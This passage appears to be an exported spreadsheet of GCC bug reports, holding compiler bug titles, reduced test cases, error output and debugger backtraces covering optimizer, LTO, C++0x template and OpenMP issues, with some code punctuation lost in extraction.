Linux alpha1 2.4.9-40 #1 Mon Sep 23 08:14:02 EDT 2002 alpha unknown
alpha1:gcc&gt;g++ -v
Using built-in specs.
Target: alphaev56-unknown-linux-gnu
Configured with: ../gcc/configure --verbose --enable-languages=c++ --disable-linux-futex --disable-nls --disable-tls
Thread model: posix
gcc version 4.3.0 20070519 (experimental)
alpha1:gcc&gt;alias CONFIGURECVS
alias CONFIGURECVS='../gcc/configure --verbose --enable-languages=c++ --disable-linux-futex --disable-nls --disable-tls &gt;clog 2&gt;&amp;1 &amp;'
alpha1:gcc&gt;alias BUILD
alias BUILD='nice gmake CFLAGS='\'''\'' BOOT_CFLAGS='\'''\'' LIBCFLAGS='\''-g'\'' LIBCXXFLAGS='\''-g'\'' bootstrap &gt;log 2&gt;&amp;1 &amp;'</t>
  </si>
  <si>
    <t>GCC-11210</t>
  </si>
  <si>
    <t>optimizer drops conditional with typecast from signed to unsigned char</t>
  </si>
  <si>
    <t>I have a problem compiling the following code portet to
gcc/linux/intel/i686 with turned on optimization (-O). Without the
optimization it will work well.  I know this code is not very clean
(cast from signed char to unsigned char with negative value) but it
will occur at many places in this project in similar form.
With turned on optimization gcc will produce the message
test.c:29: Warnung: comparison is always 1
(in c and c++ mode) and the optimizer removes the else part. 
Weird about this is if you remove the line Head_t head from
struct Telegram_t the error will not occur and the code works as I
expect
The compile command was
gcc -Wall -O -S test.c
I've testet the gcc versions 3.3 3.2.3 and 2.95.4. They all behave same in
respect to this problem.
any suggestions?
----------------------------------------------------------------------------
#include 
typedef struct
{
  long  size 
} Head_t
typedef struct 
{
  char data[270] 
} Data_t
typedef struct
{
  Head_t head
  Data_t data
} Telegram_t
int main(void)
{
  Telegram_t t
  if ( (unsigned char)t.data.data[12] != 2  ||
       (unsigned char)t.data.data[14] != 130 ) { 
      printf(hier\n)
    } else {
      printf(nicht hier\n)
    }
  return 0
}</t>
  </si>
  <si>
    <t>GCC-40754</t>
  </si>
  <si>
    <t>lto1 dies with SIGBUS/SIGSEGV on Solaris 11/SPARC</t>
  </si>
  <si>
    <t>Running the testsuite on sparc-sun-solaris2.11 with the lto branch as of 20090709
reveals many testsuite errors like this:
Executing on host: /vol/gccsrc/obj/gcc-lto-20090709/11-gcc/gcc/testsuite/g++/../../g++ -B/vol/gccsrc/obj/gcc-lto-20090709/11-gcc/gcc/testsuite/g++/../../ cp_lto_20080709_0.o  -nostdinc++ -I/vol/gccsrc/obj/gcc-lto-20090709/11-gcc/sparc-sun-solaris2.11/libstdc++-v3/include/sparc-sun-solaris2.11 -I/vol/gccsrc/obj/gcc-lto-20090709/11-gcc/sparc-sun-solaris2.11/libstdc++-v3/include -I/vol/gcc/src/gcc-lto/libstdc++-v3/libsupc++ -I/vol/gcc/src/gcc-lto/libstdc++-v3/include/backward -I/vol/gcc/src/gcc-lto/libstdc++-v3/testsuite/util -fmessage-length=0 -O0 -fwhopr     -L/vol/gccsrc/obj/gcc-lto-20090709/11-gcc/sparc-sun-solaris2.11/./libstdc++-v3/src/.libs  -L/vol/gccsrc/obj/gcc-lto-20090709/11-gcc/sparc-sun-solaris2.11/./libstdc++-v3/src/.libs -L/vol/gccsrc/obj/gcc-lto-20090709/11-gcc/sparc-sun-solaris2.11/./libiberty  -lm   -o g++-dg-lto-20080709-01    (timeout = 300)
lto1: internal compiler error: Bus Error
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make: *** [ccFjaiMJ-cp_lto_20080709_0.o.lto.ltrans.o] Error 1
lto1: fatal error: /vol/gccsrc/obj/gcc-lto-20090709/11-gcc/gcc/testsuite/g++/../../ltrans-driver terminated with status 512
compilation terminated.
lto-wrapper: /vol/gccsrc/obj/gcc-lto-20090709/11-gcc/gcc/testsuite/g++/../../g++ returned 1 exit status
collect2: lto-wrapper returned 1 exit status
compiler exited with status 1
output is:
lto1: internal compiler error: Bus Error
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make: *** [ccFjaiMJ-cp_lto_20080709_0.o.lto.ltrans.o] Error 1
lto1: fatal error: /vol/gccsrc/obj/gcc-lto-20090709/11-gcc/gcc/testsuite/g++/../../ltrans-driver terminated with status 512
compilation terminated.
lto-wrapper: /vol/gccsrc/obj/gcc-lto-20090709/11-gcc/gcc/testsuite/g++/../../g++ returned 1 exit status
collect2: lto-wrapper returned 1 exit status
FAIL: g++.dg/lto/20080709 cp_lto_20080709_0.o-cp_lto_20080709_0.o link  (internal compiler error)
Running lto1 under gdb reveals
Program received signal SIGSEGV Segmentation fault.
lto_main (debug_p=0) at /vol/gcc/src/gcc-lto/gcc/lto/lto.c:180
(gdb) where
#0  lto_main (debug_p=0) at /vol/gcc/src/gcc-lto/gcc/lto/lto.c:180
#1  0x003901e0 in toplev_main (argc=15 argv=0xffbff55c) at /vol/gcc/src/gcc-lto/gcc/toplev.c:1039
#2  0x00097ee4 in _start ()
this can only happen if data (aka header) is NULL at this point but gdb
cannot print them</t>
  </si>
  <si>
    <t>GCC-33441</t>
  </si>
  <si>
    <t>[4.2 Regression] FAIL: g++.dg/ext/vla4.C  (test for errors line 10)</t>
  </si>
  <si>
    <t>Executing on host: /mnt/gnu/gcc/objdir/gcc/testsuite/g++/../../g++ -B/mnt/gnu/gc
c/objdir/gcc/testsuite/g++/../../ /mnt/gnu/gcc/gcc/gcc/testsuite/g++.dg/ext/vla4
.C  -nostdinc++ -I/mnt/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/libstdc++-v3/include
/hppa2.0w-hp-hpux11.11 -I/mnt/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/libstdc++-v3/
include -I/mnt/gnu/gcc/gcc/libstdc++-v3/libsupc++ -I/mnt/gnu/gcc/gcc/libstdc++-v
3/include/backward -I/mnt/gnu/gcc/gcc/libstdc++-v3/testsuite/util -fmessage-leng
th=0    -S  -o vla4.s    (timeout = 300)
/mnt/gnu/gcc/gcc/gcc/testsuite/g++.dg/ext/vla4.C: In function 'void f(int)':
/mnt/gnu/gcc/gcc/gcc/testsuite/g++.dg/ext/vla4.C:9: error: cannot create type in
formation for type 'int (*)[(((long unsigned int)(((int)i) - 1)) + 1u)]' because
 it involves types of variable size
/mnt/gnu/gcc/gcc/gcc/testsuite/g++.dg/ext/vla4.C: In function 'int main()':
/mnt/gnu/gcc/gcc/gcc/testsuite/g++.dg/ext/vla4.C:18: error: cannot create type i
nformation for type 'int (*)[(((long unsigned int)(((int)i) - 1)) + 1u)]' becaus
e it involves types of variable size
compiler exited with status 1
output is:
/mnt/gnu/gcc/gcc/gcc/testsuite/g++.dg/ext/vla4.C: In function 'void f(int)':
/mnt/gnu/gcc/gcc/gcc/testsuite/g++.dg/ext/vla4.C:9: error: cannot create type in
formation for type 'int (*)[(((long unsigned int)(((int)i) - 1)) + 1u)]' because
 it involves types of variable size
/mnt/gnu/gcc/gcc/gcc/testsuite/g++.dg/ext/vla4.C: In function 'int main()':
/mnt/gnu/gcc/gcc/gcc/testsuite/g++.dg/ext/vla4.C:18: error: cannot create type i
nformation for type 'int (*)[(((long unsigned int)(((int)i) - 1)) + 1u)]' becaus
e it involves types of variable size
PASS: g++.dg/ext/vla4.C  (test for errors line 9)
FAIL: g++.dg/ext/vla4.C  (test for errors line 10)
PASS: g++.dg/ext/vla4.C  (test for errors line 18)
PASS: g++.dg/ext/vla4.C (test for excess errors)
This test didn't fail in 4.2.1 so this fail is a regression.</t>
  </si>
  <si>
    <t>GCC-41753</t>
  </si>
  <si>
    <t>[OOP] segfault with -O2 using methods as actual arguments</t>
  </si>
  <si>
    <t>The following produces a segfault at runtime with -O2 and higher
module m
  type t
    real x
  contains
    procedure pass :: a
  end type
contains
  real function a (arg)
    class (t) :: arg
    a = arg%x
  end function
  real function b (arg)
    real :: arg
    b = arg*2
  end function
  subroutine s
    class(t) allocatable :: z
    allocate(z)          ! see tree-optimized output
    z%x = 42             ! see tree-optimized output
    print * b (z%a())   ! see tree-optimized output
  end subroutine
end module
  use m
  call s
end
With -O0 the marked lines give
:
  D.1348_1 = malloc (4)
  if (D.1348_1 == 0B)
    goto 
  else
    goto 
:
  _gfortran_os_error (
:
  D.1374_2 = (struct t *) D.1348_1
  z.$data = D.1374_2
  z.$vindex = 2800126
  z.$size = 4
  D.1375_3 = z.$data
  D.1375_3-&gt;x = 4.2e+1
  dt_parm.0.common.filename = 
  dt_parm.0.common.line = 22
  dt_parm.0.common.flags = 128
  dt_parm.0.common.unit = 6
  _gfortran_st_write (
  D.1376_4 = __m_MOD_a (
  D.1350 = D.1376_4
  D.1377_5 = __m_MOD_b (
  D.1351 = D.1377_5
  _gfortran_transfer_real (
  _gfortran_st_write_done (
whilst with -O2
:
  D.1348_1 = malloc (4)
  if (D.1348_1 == 0B)
    goto 
  else
    goto 
:
  _gfortran_os_error (
:
  D.1374_2 = (struct t *) D.1348_1
  dt_parm.0.common.filename = 
  dt_parm.0.common.line = 22
  dt_parm.0.common.flags = 128
  dt_parm.0.common.unit = 6
  _gfortran_st_write (
  arg_21 = (struct .class.t 
  D.1389_22 = arg_21-&gt;$data
  D.1386_23 = D.1389_22-&gt;x
  D.1392_26 = D.1386_23 * 2.0e+0
  D.1351 = D.1392_26
  _gfortran_transfer_real (
  _gfortran_st_write_done (
ie. the important part of the allocation and the entire assignment disappear!
Since the PRINT then tries to access the data component of the CLASS object the segfault results</t>
  </si>
  <si>
    <t>GCC-21023</t>
  </si>
  <si>
    <t>mudflap reports errors for external array variable with no size specified</t>
  </si>
  <si>
    <t>Yesterday I upgraded my fedora core 3 instalation and got gcc4 installed.
I tested the mudflap code and found a problem. The reduced test case is
below.
when I have two programs a.c and b.c
-- a.c --
typedef struct { char *name } dummy
dummy d[] = { {a} {0} }
-- b.c --
typedef struct { char *name } dummy
extern dummy d[]
int
main (void)
{
  dummy *pd = d
  while (pd-&gt;name)
    {
      printf (%s\n pd-&gt;name)
      pd++
    }
}
and compile this with:
gcc4 -fmudflap a.c b.c -o a -lmudflap 
when I run the program I get:
a
*******
mudflap violation 1 (check/read): time=1113495140.046642 ptr=0x8049a00 size=4
pc=0xb7eff322 location=`b.c:9 (main)'
      /usr/lib/libmudflap.so.0(__mf_check+0x44) [0xb7eff322]
      ./a(main+0x8b) [0x8048787]
      /usr/lib/libmudflap.so.0(__wrap_main+0x1d8) [0xb7f0004e]
Nearby object 1: checked region begins 8B before and ends 5B before
mudflap object 0x80ca090: name=`__mf_lc_mask'
bounds=[0x8049a080x8049a0b] size=4 area=no-access check=0r/0w liveness=0
alloc time=1113495140.046375 pc=0xb7effe0a
Nearby object 2: checked region begins 16B before and ends 13B before
mudflap object 0x80ca028: name=`__mf_lookup_cache'
bounds=[0x8049a100x80c9a0f] size=524288 area=no-access check=0r/0w liveness=0
alloc time=1113495140.046371 pc=0xb7effe0a
number of nearby objects: 2
There should be no error.
I think the problem is in tree-mudflap.c in function mudflap_finish_file.
Here is a check for TREE_STATIC. I think this should be !TREE_PUBLIC ???
I assigned this to 4.0.1 because I probably can not assign this to 4.0.0
anymore?</t>
  </si>
  <si>
    <t>hermantenbrugge</t>
  </si>
  <si>
    <t>GCC-5321</t>
  </si>
  <si>
    <t>compliation question</t>
  </si>
  <si>
    <t>jianhua.zhou</t>
  </si>
  <si>
    <t>GCC-51696</t>
  </si>
  <si>
    <t>[trans-mem] unsafe indirect function call in struct not properly displayed</t>
  </si>
  <si>
    <t>Created attachment 26196
Attached testcase
With an unsafe indirect function call the error message is not clear. I don't know if it can display the declaration. In the worst case unsafe indirect function call within â€˜transaction_safeâ€™ function should be ok.
$ ./gcc/xgcc -B./gcc/ -fgnu-tm -O0 testcase.i
testcase.i: In function â€˜funcâ€™:
testcase.i:7:21: error: unsafe function call â€˜â€™ within â€˜transaction_safeâ€™ function
testcase.i:8:12: error: unsafe function call â€˜compare.1â€™ within â€˜transaction_safeâ€™ function
Patrick Marlier.</t>
  </si>
  <si>
    <t>GCC-38543</t>
  </si>
  <si>
    <t>[C++0x] Cannot specialize variadic template function</t>
  </si>
  <si>
    <t>GCC 4.3.2 failed to compile code with vairadic template function specialization.
Here is the code causing the problem:
template void foo( T ... args )
template void foo( int double ){}
int main()
{
  foo( 0 0.0 )
  return 55
}
I got the following error msg:
test.cpp:3: error: template-id 'foo' for 'void foo(int double)' does not match any template declaration
However the specialization using only one parameter can pass:
template void foo( T ... args )
template void foo( int ){}
int main()
{
  foo( 0 )
  return 55
}
Command used to compile:
g++ -std=c++0x    test.cpp   -o test
Output from -v:
Using built-in specs.
Target: powerpc64-suse-linux
Configured with: ../configure --prefix=/usr --with-local-prefix=/usr/local --infodir=/usr/share/info --mandir=/usr/share/man --libdir=/usr/lib64 --libexecdir=/usr/lib64 --enable-languages=cc++objcfortranobj-c++java --enable-checking=release --with-gxx-include-dir=/usr/include/c++/4.3 --enable-ssp --disable-libssp --with-bugurl=http://bugs.opensuse.org/ --with-pkgversion='SUSE Linux' --disable-libgcj --disable-libmudflap --with-slibdir=/lib64 --with-system-zlib --enable-__cxa_atexit --enable-libstdcxx-allocator=new --disable-libstdcxx-pch --program-suffix=-4.3 --enable-version-specific-runtime-libs --enable-linux-futex --without-system-libunwind --with-cpu=power4 --enable-secureplt --with-long-double-128 --build=powerpc64-suse-linux
Thread model: posix
gcc version 4.3.2 [gcc-4_3-branch revision 141291] (SUSE Linux)</t>
  </si>
  <si>
    <t>jichaoz</t>
  </si>
  <si>
    <t>GCC-71704</t>
  </si>
  <si>
    <t>ICE with -fopenmp and some omp constructs</t>
  </si>
  <si>
    <t>With some empty openmp constructs :
$ cat z1.f90
real function f()
!$omp barrier
end
$ gfortran-6 -fopenmp -c z1.f90
f951: internal compiler error: gfc_ascii_statement(): Bad statement code
$ cat z2.f90
real function f()
!$omp parallel
!$omp end parallel
end
$ gfortran-6 -fopenmp -c z2.f90
f951: internal compiler error: gfc_ascii_statement(): Bad statement code
$ cat z3.f90
real function f()
!$omp single
!$omp end single
end
$ gfortran-6 -fopenmp -c z3.f90
f951: internal compiler error: gfc_ascii_statement(): Bad statement code
$ cat z4.f90
real function f()
!$omp critical
!$omp end critical
end
$ gfortran-6 -fopenmp -c z4.f90
f951: internal compiler error: gfc_ascii_statement(): Bad statement code
etc.</t>
  </si>
  <si>
    <t>GCC-71322</t>
  </si>
  <si>
    <t>[DR 2720] std::filesystem::permissions always follows symlinks</t>
  </si>
  <si>
    <t>Created attachment 38586
repr
Currently permissions(sym perms::none) resolves the symlink and sets the permissions on the file. I believe this is incorrect.</t>
  </si>
  <si>
    <t>GCC-6413</t>
  </si>
  <si>
    <t>PROFILE_HOOK label_no</t>
  </si>
  <si>
    <t xml:space="preserve">	There's an underlying problem with PROFILE_HOOK and it's
	label_no arg:  Inline function rtl generated by PROFILE_HOOK
	will use the value of profile_label_no when the inline
	function is defined.  For static inline functions
	profile_label_no is not incremented thus a deferred
	out-of-line expansion typically uses the wrong profile counter
	label.  On pa it's even worse as the label_no is used to
	access a local label at the start of the function with a
	pc-rel offset from the _mcount call.  Using the wrong label
	can generate assembly code that overflows ldo insns.
Release:
3.1 20020417 (prerelease)
Environment:
	pa rs6000 AIX_ABI sparc targets.
How-To-Repeat:
	Attached testcase.  Debug session for pa shows the problem.
	Note how profile_label_no is stuck on 1 for the profile_hook
	calls on the static inline functions and increments on the
	profile_function calls.
Breakpoint 4 hppa_profile_hook (label_no=0)
    at /src/gcc-ppc64-31/gcc/config/pa/pa.c:3535
2: profile_label_no = 0
1: cfun-&gt;name = 0x82e1088 foo
(gdb) c
Continuing.
Breakpoint 6 profile_function (file=0x4001a500)
    at /src/gcc-ppc64-31/gcc/final.c:1602
2: profile_label_no = 0
1: cfun-&gt;name = 0x82e1088 foo
(gdb) bt
#0  profile_function (file=0x4001a500) at /src/gcc-ppc64-31/gcc/final.c:1602
#1  0x080d9e7b in final_start_function (first=0x4001a500 file=0x82da748 
    optimize=2) at /src/gcc-ppc64-31/gcc/final.c:1531
#2  0x0817773e in rest_of_compilation (decl=0x40185b60)
    at /src/gcc-ppc64-31/gcc/toplev.c:3480
#3  0x08059592 in c_expand_body (fndecl=0x40185b60 nested_p=0 can_defer_p=1)
    at /src/gcc-ppc64-31/gcc/c-decl.c:7122
#4  0x08059357 in finish_function (nested=0 can_defer_p=1073849600)
    at /src/gcc-ppc64-31/gcc/c-decl.c:6989
#5  0x08049eb7 in yyparse_1 () at c-parse.y:386
#6  0x08176204 in compile_file () at /src/gcc-ppc64-31/gcc/toplev.c:2120
#7  0x0817a8f9 in do_compile () at /src/gcc-ppc64-31/gcc/toplev.c:5202
#8  0x0817a95b in toplev_main (argc=1073849600 argv=0x0)
    at /src/gcc-ppc64-31/gcc/toplev.c:5234
#9  0x0807fafb in main (argc=1073849600 argv=0x4001a500)
    at /src/gcc-ppc64-31/gcc/main.c:35
#10 0x4003ea8e in __libc_start_main (main=0x807fae0  argc=40 
    argv=0xbffff1c4 init=0x8049054  fini=0x8213170  
    rtld_fini=0x4000aa20  stack_end=0xbffff1bc)
    at ../sysdeps/generic/libc-start.c:92
(gdb) c
Continuing.
Breakpoint 4 hppa_profile_hook (label_no=1)
    at /src/gcc-ppc64-31/gcc/config/pa/pa.c:3535
2: profile_label_no = 1
1: cfun-&gt;name = 0x82e107f f0
(gdb) 
Continuing.
Breakpoint 4 hppa_profile_hook (label_no=1)
    at /src/gcc-ppc64-31/gcc/config/pa/pa.c:3535
2: profile_label_no = 1
1: cfun-&gt;name = 0x82e1082 f1
(gdb) 
Continuing.
Breakpoint 4 hppa_profile_hook (label_no=1)
    at /src/gcc-ppc64-31/gcc/config/pa/pa.c:3535
2: profile_label_no = 1
1: cfun-&gt;name = 0x82e1085 f2
(gdb) 
Continuing.
Breakpoint 6 profile_function (file=0x4001a600)
    at /src/gcc-ppc64-31/gcc/final.c:1602
2: profile_label_no = 1
1: cfun-&gt;name = 0x82e107f f0
(gdb) 
Continuing.
Breakpoint 6 profile_function (file=0x4001a700)
    at /src/gcc-ppc64-31/gcc/final.c:1602
2: profile_label_no = 2
1: cfun-&gt;name = 0x82e1082 f1
(gdb) 
Continuing.
Breakpoint 6 profile_function (file=0x4001a800)
    at /src/gcc-ppc64-31/gcc/final.c:1602
2: profile_label_no = 3
1: cfun-&gt;name = 0x82e1085 f2
(gdb) bt
#0  profile_function (file=0x4001a800) at /src/gcc-ppc64-31/gcc/final.c:1602
#1  0x080d9e7b in final_start_function (first=0x4001a800 file=0x82da748 
    optimize=2) at /src/gcc-ppc64-31/gcc/final.c:1531
#2  0x0817773e in rest_of_compilation (decl=0x401859a0)
    at /src/gcc-ppc64-31/gcc/toplev.c:3480
#3  0x0811c701 in output_inline_function (fndecl=0x401859a0)
    at /src/gcc-ppc64-31/gcc/integrate.c:3004
#4  0x08175e97 in wrapup_global_declarations (vec=0x82e9cd0 len=0)
    at /src/gcc-ppc64-31/gcc/toplev.c:1975
#5  0x0817627b in compile_file () at /src/gcc-ppc64-31/gcc/toplev.c:2152
#6  0x0817a8f9 in do_compile () at /src/gcc-ppc64-31/gcc/toplev.c:5202
#7  0x0817a95b in toplev_main (argc=1073850368 argv=0x0)
    at /src/gcc-ppc64-31/gcc/toplev.c:5234
#8  0x0807fafb in main (argc=1073850368 argv=0x4001a800)
    at /src/gcc-ppc64-31/gcc/main.c:35
#9  0x4003ea8e in __libc_start_main (main=0x807fae0  argc=40 
    argv=0xbffff1c4 init=0x8049054  fini=0x8213170  
    rtld_fini=0x4000aa20  stack_end=0xbffff1bc)
    at ../sysdeps/generic/libc-start.c:92
(gdb) c
Continuing.
Program exited normally.
Unformatted:
 --HG+GLK89HZ1zG0kk
 Content-Type: text/plain charset=us-ascii
 Content-Disposition: inline</t>
  </si>
  <si>
    <t>GCC-1798</t>
  </si>
  <si>
    <t>undefined reference to `std::istream::seekg(std::fpos)'</t>
  </si>
  <si>
    <t>Reading specs from /usr/bin/../lib/gcc-lib/i386-pc-linux-gnu/2.97/specs
Configured with: ../configure --prefix=/tmp/gcc-20010126-root/usr/local --enable-shared --enable-threads
 --disable-checking i386-pc-linux-gnu
gcc version 2.97 20010126 (experimental)
 /usr/bin/../lib/gcc-lib/i386-pc-linux-gnu/2.97/cpp0 -lang-c++ -D_GNU_SOURCE -D__GNUG__=2 -D__GXX_ABI_VE
RSION=100 -v -iprefix /usr/bin/../lib/gcc-lib/i386-pc-linux-gnu/2.97/ -D__GNUC__=2 -D__GNUC_MINOR__=97 -
D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asy
stem=posix -D__STDC_HOSTED__=1 -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i386__ seek
_bug.cc seek_bug.ii
GNU CPP version 2.97 20010126 (experimental) (cpplib) (i386 Linux/ELF)
ignoring nonexistent directory /tmp/gcc-20010126-root/usr/local/include/g++-v3
ignoring nonexistent directory /tmp/gcc-20010126-root/usr/local/i386-pc-linux-gnu/include/g++-v3
ignoring nonexistent directory /tmp/gcc-20010126-root/usr/local/lib/gcc-lib/i386-pc-linux-gnu/2.97/incl
ude
ignoring nonexistent directory /tmp/gcc-20010126-root/usr/local/i386-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/include/g++-v3
 /usr/lib/gcc-lib/i386-pc-linux-gnu/2.97/include
 /usr/i386-pc-linux-gnu/include
 /usr/local/include
 /usr/include
End of search list.
 /usr/bin/../lib/gcc-lib/i386-pc-linux-gnu/2.97/cc1plus -fpreprocessed seek_bug.ii -quiet -dumpbase seek
_bug.cc -version -o seek_bug.s
GNU CPP version 2.97 20010126 (experimental) (cpplib) (i386 Linux/ELF)
GNU C++ version 2.97 20010126 (experimental) (i386-pc-linux-gnu)
        compiled by GNU C version 2.97 20010126 (experimental).
 as -V -Qy -o seek_bug.o seek_bug.s
GNU assembler version 2.10.91 (i386-redhat-linux) using BFD version 2.10.1.0.4
 /usr/bin/../lib/gcc-lib/i386-pc-linux-gnu/2.97/collect2 -m elf_i386 -dynamic-linker /lib/ld-linux.so.2 
/usr/bin/../lib/gcc-lib/i386-pc-linux-gnu/2.97/../../../crt1.o /usr/bin/../lib/gcc-lib/i386-pc-linux-gnu
/2.97/../../../crti.o /usr/bin/../lib/gcc-lib/i386-pc-linux-gnu/2.97/crtbegin.o -L/usr/bin/../lib/gcc-li
b/i386-pc-linux-gnu/2.97 -L/usr/bin/../lib/gcc-lib -L/usr/bin/../lib/gcc-lib/i386-pc-linux-gnu/2.97/../.
./.. seek_bug.o -lstdc++ -lm -lgcc -lc -lgcc /usr/bin/../lib/gcc-lib/i386-pc-linux-gnu/2.97/crtend.o /us
r/bin/../lib/gcc-lib/i386-pc-linux-gnu/2.97/../../../crtn.o
seek_bug.o: In function `main':
seek_bug.o(.text+0x27): undefined reference to `std::istream::seekg(std::fpos)'
collect2: ld returned 1 exit status
Release:
gcc version 2.97 20010126 (experimental)
Environment:
Linux 2.2.16-22 i586
How-To-Repeat:
#include 
int main (void)
{
  std::cin.seekg (std::cin.tellg())
  return 0
}</t>
  </si>
  <si>
    <t>rafa</t>
  </si>
  <si>
    <t>GCC-6049</t>
  </si>
  <si>
    <t>Wrong amount of branch edges after unconditional jump</t>
  </si>
  <si>
    <t>legal code rejected by optimization stage
Release:
3.2 20020319 (experimental)
Environment:
System: Linux isabella 2.4.10-4GB #1 Tue Sep 25 12:33:54 GMT 2001 i586 unknown
Architecture: i586
host: i586-pc-linux-gnu
build: i586-pc-linux-gnu
target: i586-pc-linux-gnu
configured with:  /home/roland/gcc/configure --enable-threads=posix --enable-languages=cc++java
How-To-Repeat:
# gcj -c Test1.java
# gcj -O -c Test1.java
Test1.java: In class `Test1':
Test1.java: In method `Test1.test()':
Test1.java:10: Wrong amount of branch edges after unconditional jump 1
Test1.java:10: verify_flow_info failed
class Test1 {
  Object table
  void test() {
        Object tab = table
        if (tab == null) {
            synchronized(this) {
                tab = table
            }
        }
  }  
}</t>
  </si>
  <si>
    <t>r.hautz</t>
  </si>
  <si>
    <t>GCC-33996</t>
  </si>
  <si>
    <t>C++0x: move overloading problem with move constructor and copy constructor</t>
  </si>
  <si>
    <t>More crazy issues here blocking meaningful work :(
Consider the below: it doesn't compile tries to use the move constructor. If I define bar in class then things work. Seems kind of broken optimization.
struct type
{
  type() { }
  type(const type&amp;) { }
private:
  type(type
}
template
  struct identity
  {
    typedef _Tp type
  }
template
  inline _Tp&amp;&amp;
  forward(typename identity::type&amp;&amp; __t)
  { return __t }
struct vec
{
  template
    void
    bar(_Args
/*
    {
      type(forward(__args))
    }
*/
}
template
  void
  vec::bar(_Args&amp;&amp; __args)
  {
    type(forward(__args))
  }
int main()
{
  vec v
  type c
  v.bar(c)
}</t>
  </si>
  <si>
    <t>GCC-19653</t>
  </si>
  <si>
    <t>x87 reg allocated for constants for -mfpmath=sse</t>
  </si>
  <si>
    <t>A self-contained testcase is attached to this bugreport. Please compile it with
-O2 -march=pentium4 -mfpmath=sse -ffast-math.
This part of the testcase:
  ...
  if ( fabs(fabs(NewRay-&gt;Direction[Z])- 1.) &lt; .1 ) {
    /* too close to vertical for comfort so use cross product with horizon */
    up[X] = 0. up[Y] = 1. up[Z] = 0.
  }
  else
  {
    up[X] = 0. up[Y] = 0. up[Z] = 1.
  }
  VCross(n2 NewRay-&gt;Direction up)  VNormalizeEq(n2)
  VCross(n3 NewRay-&gt;Direction n2)  VNormalizeEq(n3)
  ...
will generate:
	jae	.L2
	fldz
	fstl	-112(%ebp)
	movsd	-112(%ebp) %xmm2
	fld1
	fstpl	-112(%ebp)
	movsd	-112(%ebp) %xmm1
.L5:
	fldl	32(%ebx)
	fstpl	-96(%ebp)
	movsd	-96(%ebp) %xmm3
	mulsd	%xmm2 %xmm3
	movapd	%xmm5 %xmm0
	mulsd	%xmm1 %xmm0
	subsd	%xmm0 %xmm3
	fldl	24(%ebx)
	fstpl	-88(%ebp)
	mulsd	-88(%ebp) %xmm2
	xorpd	.LC5 %xmm2
	movsd	-88(%ebp) %xmm4
        ...
.L2:
	fld1
	fstpl	-112(%ebp)
	movsd	-112(%ebp) %xmm2
	fldz
	fstl	-112(%ebp)
	movsd	-112(%ebp) %xmm1
	jmp	.L5
Uros.</t>
  </si>
  <si>
    <t>GCC-58637</t>
  </si>
  <si>
    <t>[c++1y] ICE with wrong usage of template in front of function containing auto parameter</t>
  </si>
  <si>
    <t>The following invalid line of code (compiled with -std=c++1y) triggers an ICE
on trunk (since at least 4.9.0-20130920):
=============================
template void foo(auto)
=============================
bug.cc:1:21: internal compiler error: in add_implicit_template_parms at cp/parser.c:28978
 template void foo(auto)
                     ^
0x64f044 add_implicit_template_parms
        ../../gcc/gcc/cp/parser.c:28978
0x64f044 cp_parser_parameter_declaration_list
        ../../gcc/gcc/cp/parser.c:18067
0x64f356 cp_parser_parameter_declaration_clause
        ../../gcc/gcc/cp/parser.c:17882
0x649f04 cp_parser_direct_declarator
        ../../gcc/gcc/cp/parser.c:16834
0x649f04 cp_parser_declarator
        ../../gcc/gcc/cp/parser.c:16705
0x650cc7 cp_parser_init_declarator
        ../../gcc/gcc/cp/parser.c:16268
0x651fd4 cp_parser_single_declaration
        ../../gcc/gcc/cp/parser.c:22665
0x6553fd cp_parser_explicit_specialization
        ../../gcc/gcc/cp/parser.c:13986
0x65cac5 cp_parser_declaration
        ../../gcc/gcc/cp/parser.c:10726
0x65b5aa cp_parser_declaration_seq_opt
        ../../gcc/gcc/cp/parser.c:10659
0x65ce76 cp_parser_translation_unit
        ../../gcc/gcc/cp/parser.c:3939
0x65ce76 c_parse_file()
        ../../gcc/gcc/cp/parser.c:28911
0x7708b3 c_common_parse_file()
        ../../gcc/gcc/c-family/c-opts.c:1046
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-51827</t>
  </si>
  <si>
    <t>[4.7 regression] Error: 'FOO' conflicts with a previous declaration with PCH/LTO/C++11</t>
  </si>
  <si>
    <t>GCC 4.7.0 20120107 (experimental)
TestCase.H:3:29: error: 'T::T(S) [with A = {A ...} Y = int]' conflicts with a previous declaration
TestCase.H:3:29: note: previous declaration 'T::T(S)'
TestCase.H:3:29: note: -fabi-version=6 (or =0) avoids this error with a change in mangling
TestCase.H:3:29: error: 'T::T(S) [with A = {A ...} Y = int]' conflicts with a previous declaration
TestCase.H:3:29: note: previous declaration 'T::T(S)'
TestCase.H:3:29: note: -fabi-version=6 (or =0) avoids this error with a change in mangling
Compile with `-flto -std=gnu++11':
=================== 8&lt; ===================
template struct S { }
template struct T {
  template  T(S )
}
inline void f(T) { }
=================== &gt;8 ===================</t>
  </si>
  <si>
    <t>GCC-1986</t>
  </si>
  <si>
    <t>bootstrap error in CVS gcc libstdc++/libmath/mathconf.h</t>
  </si>
  <si>
    <t>GCC has a bootstrap error when compiling the latest cvs:
  /gcc/libstdc++-v3/libmath/mathconf.h:205:7: #error We need INFINITE_P
Here's what I used to configure gcc:
-------------------------------------------------------
../gcc/configure --enable-threads --enable-shared --enable-languages=c++ --with-as=/usr/bin/as
------------------------------------------------------
Here's what I saw when I after I typed
 gmake bootstrap 
-------------------------------------------------------
/home/matthew/Uber/CVS/objdir/gcc/xgcc -B/home/matthew/Uber/CVS/objdir/gcc/ -B/usr/local/i586-sco-sysv5uw7.1.1/bin/ -B/usr/local/i586-sco-sysv5uw7.1.1/lib/ -isystem /usr/local/i586-sco-sysv5uw7.1.1/include -DHAVE_CONFIG_H -I. -I../../../../gcc/libstdc++-v3/libmath -I.. -I../../../../gcc/libstdc++-v3/include -I../include -g -O2 -c ../../../../gcc/libstdc++-v3/libmath/signbit.c  -fPIC -DPIC -o .libs/signbit.o
In file included from ../../../../gcc/libstdc++-v3/libmath/signbit.c:32:
